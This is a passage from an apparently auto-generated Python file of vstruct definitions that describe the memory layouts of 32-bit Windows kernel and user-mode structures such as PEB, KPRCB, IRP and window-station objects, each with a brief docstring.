        self.RotationSupport = D3DKMDT_VIDPN_PRESENT_PATH_ROTATION_SUPPORT()
class KDEVICE_QUEUE(vstruct.VStruct):
    """Kernel device queue: type/size header, device list, lock, busy flag
    (3 trailing pad bytes keep the 0x14 size)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.DeviceListHead = LIST_ENTRY()
        self.Lock = v_uint32()
        self.Busy = v_uint8()
        self._pad0014 = v_bytes(size=3)
class CALLBACKWND(vstruct.VStruct):
    """Callback window reference: handle, window pointer, activation ctx."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hwnd = v_ptr32()
        self.pwnd = v_ptr32()
        self.pActCtx = v_ptr32()
class _unnamed_12395(vstruct.VStruct):
    """Anonymous embedded structure: Overlay plus 8 pad bytes to 0x30."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Overlay = _unnamed_12510()
        self._pad0030 = v_bytes(size=8)
class IO_SECURITY_CONTEXT(vstruct.VStruct):
    """I/O security context: QoS and access-state pointers plus the
    desired/full create access masks."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityQos = v_ptr32()
        self.AccessState = v_ptr32()
        self.DesiredAccess = v_uint32()
        self.FullCreateOptions = v_uint32()
class tagSIZE(vstruct.VStruct):
    """2-D extent: cx (width) and cy (height)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.cx = v_uint32()
        self.cy = v_uint32()
class tagDESKTOPVIEW(vstruct.VStruct):
    """Desktop view mapping: next link, desktop pointer, client delta."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pdvNext = v_ptr32()
        self.pdesk = v_ptr32()
        self.ulClientDelta = v_uint32()
class _unnamed_12392(vstruct.VStruct):
    """Anonymous embedded structure wrapping AsynchronousParameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.AsynchronousParameters = _unnamed_12410()
class PROCMARKHEAD(vstruct.VStruct):
    """Process-marked object header: handle, lock count, WOW task, owning
    process-info pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.h = v_ptr32()
        self.cLockObj = v_uint32()
        self.hTaskWow = v_uint32()
        self.ppi = v_ptr32()
class INITIAL_PRIVILEGE_SET(vstruct.VStruct):
    """Initial privilege set: count, control flags, and three inline
    LUID_AND_ATTRIBUTES entries."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PrivilegeCount = v_uint32()
        self.Control = v_uint32()
        self.Privilege = vstruct.VArray([ LUID_AND_ATTRIBUTES() for i in xrange(3) ])
class D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES(vstruct.VStruct):
    """Per-channel color-coefficient dynamic ranges (four channels)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.FirstChannel = v_uint32()
        self.SecondChannel = v_uint32()
        self.ThirdChannel = v_uint32()
        self.FourthChannel = v_uint32()
class WHEA_ERROR_RECORD_HEADER_FLAGS(vstruct.VStruct):
    """WHEA record-header flags word (bitfields collapsed to uint32)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Recovered = v_uint32()
class _unnamed_15582(vstruct.VStruct):
    """Anonymous embedded structure: attribute id plus data byte count."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Attrib = v_uint32()
        self.cbData = v_uint32()
class _unnamed_15585(vstruct.VStruct):
    """Anonymous embedded structure: same layout as _unnamed_15582
    (distinct generated names for distinct anonymous members)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Attrib = v_uint32()
        self.cbData = v_uint32()
class D3DKMDT_FREQUENCY_RANGE(vstruct.VStruct):
    """Monitor frequency range: min/max vertical and horizontal sync
    frequencies as rationals."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MinVSyncFreq = D3DDDI_RATIONAL()
        self.MaxVSyncFreq = D3DDDI_RATIONAL()
        self.MinHSyncFreq = D3DDDI_RATIONAL()
        self.MaxHSyncFreq = D3DDDI_RATIONAL()
class PFNCLIENT(vstruct.VStruct):
    """Client window-procedure function-pointer table.

    Index order is the layout contract; each field is one proc pointer.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pfnScrollBarWndProc = v_ptr32()
        self.pfnTitleWndProc = v_ptr32()
        self.pfnMenuWndProc = v_ptr32()
        self.pfnDesktopWndProc = v_ptr32()
        self.pfnDefWindowProc = v_ptr32()
        self.pfnMessageWindowProc = v_ptr32()
        self.pfnSwitchWindowProc = v_ptr32()
        self.pfnButtonWndProc = v_ptr32()
        self.pfnComboBoxWndProc = v_ptr32()
        self.pfnComboListBoxProc = v_ptr32()
        self.pfnDialogWndProc = v_ptr32()
        self.pfnEditWndProc = v_ptr32()
        self.pfnListBoxWndProc = v_ptr32()
        self.pfnMDIClientWndProc = v_ptr32()
        self.pfnStaticWndProc = v_ptr32()
        self.pfnImeWndProc = v_ptr32()
        self.pfnGhostWndProc = v_ptr32()
        self.pfnHkINLPCWPSTRUCT = v_ptr32()
        self.pfnHkINLPCWPRETSTRUCT = v_ptr32()
        self.pfnDispatchHook = v_ptr32()
        self.pfnDispatchDefWindowProc = v_ptr32()
        self.pfnDispatchMessage = v_ptr32()
        self.pfnMDIActivateDlgProc = v_ptr32()
class ACTIVATION_CONTEXT_DATA(vstruct.VStruct):
    """Opaque placeholder: generator emitted no fields for this type."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class FILE_NETWORK_OPEN_INFORMATION(vstruct.VStruct):
    """File network-open info: timestamps, sizes, attributes
    (4 pad bytes bring the struct to 0x38)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CreationTime = LARGE_INTEGER()
        self.LastAccessTime = LARGE_INTEGER()
        self.LastWriteTime = LARGE_INTEGER()
        self.ChangeTime = LARGE_INTEGER()
        self.AllocationSize = LARGE_INTEGER()
        self.EndOfFile = LARGE_INTEGER()
        self.FileAttributes = v_uint32()
        self._pad0038 = v_bytes(size=4)
class TEB_ACTIVE_FRAME(vstruct.VStruct):
    """TEB active frame: flags, previous-frame link, context pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flags = v_uint32()
        self.Previous = v_ptr32()
        self.Context = v_ptr32()
class tagSVR_INSTANCE_INFO(vstruct.VStruct):
    """DDE-style server instance info: object head, links, command flags,
    event window and conversation-info pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = THROBJHEAD()
        self.next = v_ptr32()
        self.nextInThisThread = v_ptr32()
        self.afCmd = v_uint32()
        self.spwndEvent = v_ptr32()
        self.pcii = v_ptr32()
class RTL_DRIVE_LETTER_CURDIR(vstruct.VStruct):
    """Per-drive current directory: flags/length, timestamp, DOS path."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flags = v_uint16()
        self.Length = v_uint16()
        self.TimeStamp = v_uint32()
        self.DosPath = STRING()
class GENERAL_LOOKASIDE(vstruct.VStruct):
    """General lookaside list: SLIST head, depth limits, allocation/free
    statistics, custom allocate/free hooks, and list linkage."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ListHead = SLIST_HEADER()
        self.Depth = v_uint16()
        self.MaximumDepth = v_uint16()
        self.TotalAllocates = v_uint32()
        self.AllocateMisses = v_uint32()
        self.TotalFrees = v_uint32()
        self.FreeMisses = v_uint32()
        self.Type = v_uint32()
        self.Tag = v_uint32()
        self.Size = v_uint32()
        self.AllocateEx = v_ptr32()
        self.FreeEx = v_ptr32()
        self.ListEntry = LIST_ENTRY()
        self.LastTotalAllocates = v_uint32()
        self.LastAllocateMisses = v_uint32()
        self.Future = vstruct.VArray([ v_uint32() for i in xrange(2) ])
class VWPL(vstruct.VStruct):
    """Variable window-pointer list: counts plus a zero-length trailing
    element array (elements follow the header in memory)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.cPwnd = v_uint32()
        self.cElem = v_uint32()
        self.cThreshhold = v_uint32()
        self.fTagged = v_uint32()
        self.aElement = vstruct.VArray([ VWPLELEMENT() for i in xrange(0) ])
class KPRCB(vstruct.VStruct):
    """Kernel processor control block (truncated view): versioning, thread
    pointers, CPU identification, processor state, reserved areas, and the
    per-processor spin-lock queue array.

    Order and the exact pad/array sizes are the layout contract.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MinorVersion = v_uint16()
        self.MajorVersion = v_uint16()
        self.CurrentThread = v_ptr32()
        self.NextThread = v_ptr32()
        self.IdleThread = v_ptr32()
        self.LegacyNumber = v_uint8()
        self.NestingLevel = v_uint8()
        self.BuildType = v_uint16()
        self.CpuType = v_uint8()
        self.CpuID = v_uint8()
        self.CpuStep = v_uint16()
        self.ProcessorState = KPROCESSOR_STATE()
        self.KernelReserved = vstruct.VArray([ v_uint32() for i in xrange(16) ])
        self.HalReserved = vstruct.VArray([ v_uint32() for i in xrange(16) ])
        self.CFlushSize = v_uint32()
        self.CoresPerPhysicalProcessor = v_uint8()
        self.LogicalProcessorsPerCore = v_uint8()
        self.PrcbPad0 = vstruct.VArray([ v_uint8() for i in xrange(2) ])
        self.MHz = v_uint32()
        self.CpuVendor = v_uint8()
        self.GroupIndex = v_uint8()
        self.Group = v_uint16()
        self.GroupSetMember = v_uint32()
        self.Number = v_uint32()
        self.PrcbPad1 = vstruct.VArray([ v_uint8() for i in xrange(72) ])
        self.LockQueue = vstruct.VArray([ KSPIN_LOCK_QUEUE() for i in xrange(17) ])
class ULARGE_INTEGER(vstruct.VStruct):
    """Unsigned 64-bit value split into low/high 32-bit halves."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.LowPart = v_uint32()
        self.HighPart = v_uint32()
class tagCURSOR(vstruct.VStruct):
    """Cursor/icon object: process-marked head, name/module atoms, hotspot,
    mask/color/alpha bitmap handles, bounds and dimensions."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = PROCMARKHEAD()
        self.pcurNext = v_ptr32()
        self.strName = UNICODE_STRING()
        self.atomModName = v_uint16()
        self.rt = v_uint16()
        self.CURSORF_flags = v_uint32()
        self.xHotspot = v_uint16()
        self.yHotspot = v_uint16()
        self.hbmMask = v_ptr32()
        self.hbmColor = v_ptr32()
        self.hbmAlpha = v_ptr32()
        self.rcBounds = tagRECT()
        self.hbmUserAlpha = v_ptr32()
        self.bpp = v_uint32()
        self.cx = v_uint32()
        self.cy = v_uint32()
class tagDCE(vstruct.VStruct):
    """Display-context entry: DC handle, associated windows, clip regions,
    DCX flags, and owning thread/process/monitor pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pdceNext = v_ptr32()
        self.hdc = v_ptr32()
        self.pwndOrg = v_ptr32()
        self.pwndClip = v_ptr32()
        self.pwndRedirect = v_ptr32()
        self.hrgnClip = v_ptr32()
        self.hrgnClipPublic = v_ptr32()
        self.hrgnSavedVis = v_ptr32()
        self.DCX_flags = v_uint32()
        self.ptiOwner = v_ptr32()
        self.ppiOwner = v_ptr32()
        self.pMonitor = v_ptr32()
class tagPROCESS_HID_REQUEST(vstruct.VStruct):
    """Per-process HID request: list link, usage page/usage, sinkable flag,
    TLC info and target window pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.link = LIST_ENTRY()
        self.usUsagePage = v_uint16()
        self.usUsage = v_uint16()
        self.fSinkable = v_uint32()
        self.pTLCInfo = v_ptr32()
        self.spwndTarget = v_ptr32()
class NAMED_PIPE_CREATE_PARAMETERS(vstruct.VStruct):
    """Named-pipe create parameters: type/modes, instance and quota limits,
    default timeout (7 trailing pad bytes to 0x28)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NamedPipeType = v_uint32()
        self.ReadMode = v_uint32()
        self.CompletionMode = v_uint32()
        self.MaximumInstances = v_uint32()
        self.InboundQuota = v_uint32()
        self.OutboundQuota = v_uint32()
        self.DefaultTimeout = LARGE_INTEGER()
        self.TimeoutSpecified = v_uint8()
        self._pad0028 = v_bytes(size=7)
class NT_TIB(vstruct.VStruct):
    """Thread information block: SEH chain head, stack bounds, fiber data,
    arbitrary user pointer, and self pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ExceptionList = v_ptr32()
        self.StackBase = v_ptr32()
        self.StackLimit = v_ptr32()
        self.SubSystemTib = v_ptr32()
        self.FiberData = v_ptr32()
        self.ArbitraryUserPointer = v_ptr32()
        self.Self = v_ptr32()
class POWER_STATE(vstruct.VStruct):
    """Power state union collapsed to a single 32-bit SystemState value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SystemState = v_uint32()
class UNICODE_STRING(vstruct.VStruct):
    """Counted string descriptor: Length, MaximumLength, Buffer pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint16()
        self.MaximumLength = v_uint16()
        self.Buffer = v_ptr32()
class DMM_MONITORSOURCEMODESET_SERIALIZATION(vstruct.VStruct):
    """Serialized monitor source-mode set: count byte, 3 pad bytes, then a
    variable-length mode array (declared with 1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumModes = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.ModeSerialization = vstruct.VArray([ DMM_MONITOR_SOURCE_MODE_SERIALIZATION() for i in xrange(1) ])
class D3DKMDT_VIDPN_TARGET_MODE(vstruct.VStruct):
    """VidPN target mode: id, video signal info, and preference value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Id = v_uint32()
        self.VideoSignalInfo = D3DKMDT_VIDEO_SIGNAL_INFO()
        self.Preference = v_uint32()
class COMPRESSED_DATA_INFO(vstruct.VStruct):
    """Compressed-data info: format/engine, shift parameters, chunk count,
    and a variable-length chunk-size array (1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CompressionFormatAndEngine = v_uint16()
        self.CompressionUnitShift = v_uint8()
        self.ChunkShift = v_uint8()
        self.ClusterShift = v_uint8()
        self.Reserved = v_uint8()
        self.NumberOfChunks = v_uint16()
        self.CompressedChunkSizes = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class tagWOWTHREADINFO(vstruct.VStruct):
    """WOW thread info: next link, task/wait/parent ids, idle event ptr."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pwtiNext = v_ptr32()
        self.idTask = v_uint32()
        self.idWaitObject = v_uint32()
        self.idParentProcess = v_uint32()
        self.pIdleEvent = v_ptr32()
class _unnamed_12593(vstruct.VStruct):
    """Anonymous embedded structure: Length/Key plus 64-bit ByteOffset
    (matches read/write-style I/O parameters — confirm against caller)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.Key = v_uint32()
        self.ByteOffset = LARGE_INTEGER()
class PEB(vstruct.VStruct):
    """Process environment block (32-bit layout).

    Notable members: BeingDebugged flag, ImageBaseAddress, Ldr (loader
    data), ProcessParameters, ProcessHeap, OS version fields, TLS/FLS
    bitmaps, and activation-context pointers.  Field order and the
    explicit pad fields are the layout contract; do not reorder.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.InheritedAddressSpace = v_uint8()
        self.ReadImageFileExecOptions = v_uint8()
        self.BeingDebugged = v_uint8()
        self.BitField = v_uint8()
        self.Mutant = v_ptr32()
        self.ImageBaseAddress = v_ptr32()
        self.Ldr = v_ptr32()
        self.ProcessParameters = v_ptr32()
        self.SubSystemData = v_ptr32()
        self.ProcessHeap = v_ptr32()
        self.FastPebLock = v_ptr32()
        self.AtlThunkSListPtr = v_ptr32()
        self.IFEOKey = v_ptr32()
        self.CrossProcessFlags = v_uint32()
        self.KernelCallbackTable = v_ptr32()
        self.SystemReserved = vstruct.VArray([ v_uint32() for i in xrange(1) ])
        self.AtlThunkSListPtr32 = v_uint32()
        self.ApiSetMap = v_ptr32()
        self.TlsExpansionCounter = v_uint32()
        self.TlsBitmap = v_ptr32()
        self.TlsBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(2) ])
        self.ReadOnlySharedMemoryBase = v_ptr32()
        self.HotpatchInformation = v_ptr32()
        self.ReadOnlyStaticServerData = v_ptr32()
        self.AnsiCodePageData = v_ptr32()
        self.OemCodePageData = v_ptr32()
        self.UnicodeCaseTableData = v_ptr32()
        self.NumberOfProcessors = v_uint32()
        self.NtGlobalFlag = v_uint32()
        self._pad0070 = v_bytes(size=4)
        self.CriticalSectionTimeout = LARGE_INTEGER()
        self.HeapSegmentReserve = v_uint32()
        self.HeapSegmentCommit = v_uint32()
        self.HeapDeCommitTotalFreeThreshold = v_uint32()
        self.HeapDeCommitFreeBlockThreshold = v_uint32()
        self.NumberOfHeaps = v_uint32()
        self.MaximumNumberOfHeaps = v_uint32()
        self.ProcessHeaps = v_ptr32()
        self.GdiSharedHandleTable = v_ptr32()
        self.ProcessStarterHelper = v_ptr32()
        self.GdiDCAttributeList = v_uint32()
        self.LoaderLock = v_ptr32()
        self.OSMajorVersion = v_uint32()
        self.OSMinorVersion = v_uint32()
        self.OSBuildNumber = v_uint16()
        self.OSCSDVersion = v_uint16()
        self.OSPlatformId = v_uint32()
        self.ImageSubsystem = v_uint32()
        self.ImageSubsystemMajorVersion = v_uint32()
        self.ImageSubsystemMinorVersion = v_uint32()
        self.ActiveProcessAffinityMask = v_uint32()
        self.GdiHandleBuffer = vstruct.VArray([ v_uint32() for i in xrange(34) ])
        self.PostProcessInitRoutine = v_ptr32()
        self.TlsExpansionBitmap = v_ptr32()
        self.TlsExpansionBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(32) ])
        self.SessionId = v_uint32()
        self.AppCompatFlags = ULARGE_INTEGER()
        self.AppCompatFlagsUser = ULARGE_INTEGER()
        self.pShimData = v_ptr32()
        self.AppCompatInfo = v_ptr32()
        self.CSDVersion = UNICODE_STRING()
        self.ActivationContextData = v_ptr32()
        self.ProcessAssemblyStorageMap = v_ptr32()
        self.SystemDefaultActivationContextData = v_ptr32()
        self.SystemAssemblyStorageMap = v_ptr32()
        self.MinimumStackCommit = v_uint32()
        self.FlsCallback = v_ptr32()
        self.FlsListHead = LIST_ENTRY()
        self.FlsBitmap = v_ptr32()
        self.FlsBitmapBits = vstruct.VArray([ v_uint32() for i in xrange(4) ])
        self.FlsHighIndex = v_uint32()
        self.WerRegistrationData = v_ptr32()
        self.WerShipAssertPtr = v_ptr32()
        self.pContextData = v_ptr32()
        self.pImageHeaderHash = v_ptr32()
        self.TracingFlags = v_uint32()
        self._pad0248 = v_bytes(size=4)
class _unnamed_12817(vstruct.VStruct):
    """Anonymous embedded structure: a single IdType value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.IdType = v_uint32()
class W32THREAD(vstruct.VStruct):
    """Win32 per-thread GDI state: ETHREAD backlink, refcount, DC/brush
    attribute pointers, UMPD objects, sprite state, and rendering flags.

    Field order and the 2-byte pad at 0xac are the layout contract.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pEThread = v_ptr32()
        self.RefCount = v_uint32()
        self.ptlW32 = v_ptr32()
        self.pgdiDcattr = v_ptr32()
        self.pgdiBrushAttr = v_ptr32()
        self.pUMPDObjs = v_ptr32()
        self.pUMPDHeap = v_ptr32()
        self.pUMPDObj = v_ptr32()
        self.GdiTmpTgoList = LIST_ENTRY()
        self.pRBRecursionCount = v_uint32()
        self.pNonRBRecursionCount = v_uint32()
        self.tlSpriteState = TLSPRITESTATE()
        self.pSpriteState = v_ptr32()
        self.pDevHTInfo = v_ptr32()
        self.ulDevHTInfoUniqueness = v_uint32()
        self.pdcoAA = v_ptr32()
        self.pdcoRender = v_ptr32()
        self.pdcoSrc = v_ptr32()
        self.bEnableEngUpdateDeviceSurface = v_uint8()
        self.bIncludeSprites = v_uint8()
        self._pad00ac = v_bytes(size=2)
        self.ulWindowSystemRendering = v_uint32()
        self.iVisRgnUniqueness = v_uint32()
class KDPC(vstruct.VStruct):
    """Deferred procedure call object: type/importance/number header, list
    linkage, deferred routine + context, and two system arguments."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint8()
        self.Importance = v_uint8()
        self.Number = v_uint16()
        self.DpcListEntry = LIST_ENTRY()
        self.DeferredRoutine = v_ptr32()
        self.DeferredContext = v_ptr32()
        self.SystemArgument1 = v_ptr32()
        self.SystemArgument2 = v_ptr32()
        self.DpcData = v_ptr32()
class KEVENT(vstruct.VStruct):
    """Kernel event: just an embedded dispatcher header."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Header = DISPATCHER_HEADER()
class KSEMAPHORE(vstruct.VStruct):
    """Kernel semaphore: dispatcher header plus maximum-count limit."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Header = DISPATCHER_HEADER()
        self.Limit = v_uint32()
class _unnamed_16581(vstruct.VStruct):
    """Anonymous embedded structure: length/alignment plus a min/max
    64-bit address range (resource-range shaped)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.Alignment = v_uint32()
        self.MinimumAddress = LARGE_INTEGER()
        self.MaximumAddress = LARGE_INTEGER()
class OBJECT_TYPE(vstruct.VStruct):
    """Object-manager type descriptor: type list/name, object and handle
    counters, type initializer, lock, key, and callback list."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.TypeList = LIST_ENTRY()
        self.Name = UNICODE_STRING()
        self.DefaultObject = v_ptr32()
        self.Index = v_uint8()
        self._pad0018 = v_bytes(size=3)
        self.TotalNumberOfObjects = v_uint32()
        self.TotalNumberOfHandles = v_uint32()
        self.HighWaterNumberOfObjects = v_uint32()
        self.HighWaterNumberOfHandles = v_uint32()
        self.TypeInfo = OBJECT_TYPE_INITIALIZER()
        self.TypeLock = EX_PUSH_LOCK()
        self.Key = v_uint32()
        self.CallbackList = LIST_ENTRY()
class tagIMEINFO(vstruct.VStruct):
    """IME capability info: private-data size plus capability flag words."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwPrivateDataSize = v_uint32()
        self.fdwProperty = v_uint32()
        self.fdwConversionCaps = v_uint32()
        self.fdwSentenceCaps = v_uint32()
        self.fdwUICaps = v_uint32()
        self.fdwSCSCaps = v_uint32()
        self.fdwSelectCaps = v_uint32()
class DXGK_DIAG_CODE_POINT_PACKET(vstruct.VStruct):
    """Display diagnostics code-point packet: header, type, three params."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Header = DXGK_DIAG_HEADER()
        self.CodePointType = v_uint32()
        self.Param1 = v_uint32()
        self.Param2 = v_uint32()
        self.Param3 = v_uint32()
class W32PROCESS(vstruct.VStruct):
    """Win32 per-process GDI/USER state: process backlink, handle counters,
    locks, attribute free lists.  tagPROCESSINFO repeats this prefix —
    keep the two field lists in sync if regenerated."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Process = v_ptr32()
        self.RefCount = v_uint32()
        self.W32PF_Flags = v_uint32()
        self.InputIdleEvent = v_ptr32()
        self.StartCursorHideTime = v_uint32()
        self.NextStart = v_ptr32()
        self.pDCAttrList = v_ptr32()
        self.pBrushAttrList = v_ptr32()
        self.W32Pid = v_uint32()
        self.GDIHandleCount = v_uint32()
        self.GDIHandleCountPeak = v_uint32()
        self.UserHandleCount = v_uint32()
        self.UserHandleCountPeak = v_uint32()
        self.GDIPushLock = EX_PUSH_LOCK()
        self.GDIEngUserMemAllocTable = RTL_AVL_TABLE()
        self.GDIDcAttrFreeList = LIST_ENTRY()
        self.GDIBrushAttrFreeList = LIST_ENTRY()
        self.GDIW32PIDLockedBitmaps = LIST_ENTRY()
        self.hSecureGdiSharedHandleTable = v_ptr32()
        self.DxProcess = v_ptr32()
class tagKBDFILE(vstruct.VStruct):
    """Keyboard layout file object: head, links, base/table pointers, size,
    NLS table pointer, and a 32-wchar DLL name buffer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = HEAD()
        self.pkfNext = v_ptr32()
        self.hBase = v_ptr32()
        self.pKbdTbl = v_ptr32()
        self.Size = v_uint32()
        self.pKbdNlsTbl = v_ptr32()
        self.awchDllName = vstruct.VArray([ v_uint16() for i in xrange(32) ])
class DMM_COMMITVIDPNREQUEST_SERIALIZATION(vstruct.VStruct):
    """Serialized commit-VidPN request: source id, diag info, VidPN blob."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.AffectedVidPnSourceId = v_uint32()
        self.RequestDiagInfo = DMM_COMMITVIDPNREQUEST_DIAGINFO()
        self.VidPnSerialization = DMM_VIDPN_SERIALIZATION()
class EXCEPTION_REGISTRATION_RECORD(vstruct.VStruct):
    """SEH registration record: next-record link and handler pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Next = v_ptr32()
        self.Handler = v_ptr32()
class FILE_BASIC_INFORMATION(vstruct.VStruct):
    """File basic info: four timestamps plus attributes (padded to 0x28)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CreationTime = LARGE_INTEGER()
        self.LastAccessTime = LARGE_INTEGER()
        self.LastWriteTime = LARGE_INTEGER()
        self.ChangeTime = LARGE_INTEGER()
        self.FileAttributes = v_uint32()
        self._pad0028 = v_bytes(size=4)
class _unnamed_12887(vstruct.VStruct):
    """Anonymous embedded structure: raw/translated resource pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.AllocatedResources = v_ptr32()
        self.AllocatedResourcesTranslated = v_ptr32()
class LIST_ENTRY(vstruct.VStruct):
    """Doubly-linked list entry: forward (Flink) and back (Blink) links."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flink = v_ptr32()
        self.Blink = v_ptr32()
class tagUSERSTARTUPINFO(vstruct.VStruct):
    """User startup info: size, initial position/size, flags, show-window
    value, and reserved count."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.cb = v_uint32()
        self.dwX = v_uint32()
        self.dwY = v_uint32()
        self.dwXSize = v_uint32()
        self.dwYSize = v_uint32()
        self.dwFlags = v_uint32()
        self.wShowWindow = v_uint16()
        self.cbReserved2 = v_uint16()
class tagHID_PAGEONLY_REQUEST(vstruct.VStruct):
    """HID page-only request: list link, usage page, refcount
    (2 pad bytes align cRefCount to 0x0c)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.link = LIST_ENTRY()
        self.usUsagePage = v_uint16()
        self._pad000c = v_bytes(size=2)
        self.cRefCount = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_ENUMERATOR(vstruct.VStruct):
    """Dynamic hash-table enumerator: current entry, chain head, bucket."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.HashEntry = RTL_DYNAMIC_HASH_TABLE_ENTRY()
        self.ChainHead = v_ptr32()
        self.BucketIndex = v_uint32()
class tagWINDOWSTATION(vstruct.VStruct):
    """Window station: session id, desktop/keyboard-layout lists, and the
    clipboard bookkeeping (open/viewer/owner windows, format counts,
    serial numbers), plus atom table and LUID/SID identity fields."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwSessionId = v_uint32()
        self.rpwinstaNext = v_ptr32()
        self.rpdeskList = v_ptr32()
        self.pTerm = v_ptr32()
        self.dwWSF_Flags = v_uint32()
        self.spklList = v_ptr32()
        self.ptiClipLock = v_ptr32()
        self.ptiDrawingClipboard = v_ptr32()
        self.spwndClipOpen = v_ptr32()
        self.spwndClipViewer = v_ptr32()
        self.spwndClipOwner = v_ptr32()
        self.pClipBase = v_ptr32()
        self.cNumClipFormats = v_uint32()
        self.iClipSerialNumber = v_uint32()
        self.iClipSequenceNumber = v_uint32()
        self.spwndClipboardListener = v_ptr32()
        self.pGlobalAtomTable = v_ptr32()
        self.luidEndSession = LUID()
        self.luidUser = LUID()
        self.psidUser = v_ptr32()
class _unnamed_16049(vstruct.VStruct):
    """Anonymous union for IO_RESOURCE_DESCRIPTOR.u, collapsed here to its
    Port arm (other arms share the same storage)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Port = _unnamed_16581()
class DMM_VIDPNPATHSFROMSOURCE_SERIALIZATION(vstruct.VStruct):
    """Serialized per-source VidPN paths: source mode, path count, then a
    variable-length path array (1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SourceMode = D3DKMDT_VIDPN_SOURCE_MODE()
        self.NumPathsFromSource = v_uint8()
        self._pad002c = v_bytes(size=3)
        self.PathAndTargetModeSerialization = vstruct.VArray([ DMM_VIDPNPATHANDTARGETMODE_SERIALIZATION() for i in xrange(1) ])
class GUID(vstruct.VStruct):
    """GUID: Data1 (u32), Data2/Data3 (u16), Data4 (8 bytes)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Data1 = v_uint32()
        self.Data2 = v_uint16()
        self.Data3 = v_uint16()
        self.Data4 = vstruct.VArray([ v_uint8() for i in xrange(8) ])
class D3DKMDT_GRAPHICS_RENDERING_FORMAT(vstruct.VStruct):
    """Graphics rendering format: surface/visible sizes, stride, pixel
    format/basis, and value access mode."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PrimSurfSize = D3DKMDT_2DREGION()
        self.VisibleRegionSize = D3DKMDT_2DREGION()
        self.Stride = v_uint32()
        self.PixelFormat = v_uint32()
        self.ColorBasis = v_uint32()
        self.PixelValueAccessMode = v_uint32()
class GENERIC_MAPPING(vstruct.VStruct):
    """Generic-to-specific access-mask mapping: read/write/execute/all."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.GenericRead = v_uint32()
        self.GenericWrite = v_uint32()
        self.GenericExecute = v_uint32()
        self.GenericAll = v_uint32()
class IRP(vstruct.VStruct):
    """I/O request packet: header (type/size), MDL and flags, associated
    IRP union, thread linkage, status block, stack bookkeeping bytes,
    cancel state, user IOSB/event, overlay, cancel routine, user buffer,
    and tail union."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.MdlAddress = v_ptr32()
        self.Flags = v_uint32()
